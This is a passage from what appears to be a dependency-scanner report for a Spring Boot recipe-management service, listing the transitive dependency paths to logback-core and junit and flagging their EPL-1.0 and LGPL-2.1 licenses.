  • Introduced through: theandiman/recipe-management-ai-service@theandiman/recipe-management-ai-service#4f1c61e1da8a0e287e108dcc2fce33d27f1f3cd9 org.springframework.boot:spring-boot-starter-web@4.0.5 org.springframework.boot:spring-boot-starter-tomcat@4.0.5 org.springframework.boot:spring-boot-starter@4.0.5 org.springframework.boot:spring-boot-starter-logging@4.0.5 ch.qos.logback:logback-classic@1.5.32 ch.qos.logback:logback-core@1.5.32
  • Introduced through: theandiman/recipe-management-ai-service@theandiman/recipe-management-ai-service#4f1c61e1da8a0e287e108dcc2fce33d27f1f3cd9 org.springframework.boot:spring-boot-starter-webflux@4.0.5 org.springframework.boot:spring-boot-starter-jackson@4.0.5 org.springframework.boot:spring-boot-starter@4.0.5 org.springframework.boot:spring-boot-starter-logging@4.0.5 ch.qos.logback:logback-classic@1.5.32 ch.qos.logback:logback-core@1.5.32
  • Introduced through: theandiman/recipe-management-ai-service@theandiman/recipe-management-ai-service#4f1c61e1da8a0e287e108dcc2fce33d27f1f3cd9 org.springframework.boot:spring-boot-starter-webflux@4.0.5 org.springframework.boot:spring-boot-starter-reactor-netty@4.0.5 org.springframework.boot:spring-boot-starter@4.0.5 org.springframework.boot:spring-boot-starter-logging@4.0.5 ch.qos.logback:logback-classic@1.5.32 ch.qos.logback:logback-core@1.5.32
  • Introduced through: theandiman/recipe-management-ai-service@theandiman/recipe-management-ai-service#4f1c61e1da8a0e287e108dcc2fce33d27f1f3cd9 org.springdoc:springdoc-openapi-starter-webmvc-ui@2.8.15 org.springdoc:springdoc-openapi-starter-webmvc-api@2.8.15 org.springdoc:springdoc-openapi-starter-common@2.8.15 org.springframework.boot:spring-boot-starter-validation@4.0.5 org.springframework.boot:spring-boot-starter@4.0.5 org.springframework.boot:spring-boot-starter-logging@4.0.5 ch.qos.logback:logback-classic@1.5.32 ch.qos.logback:logback-core@1.5.32

Dual license: EPL-1.0, LGPL-2.1

medium severity

EPL-1.0 license

  • Module: junit:junit
  • Introduced through: com.google.firebase:firebase-admin@9.7.1

Detailed paths

  • Introduced through: theandiman/recipe-management-ai-service@theandiman/recipe-management-ai-service#4f1c61e1da8a0e287e108dcc2fce33d27f1f3cd9 com.google.firebase:firebase-admin@9.7.1 com.google.cloud:google-cloud-storage@2.64.1 com.google.api.grpc:gapic-google-cloud-storage-v2@2.64.1 junit:junit@4.13.2

EPL-1.0 license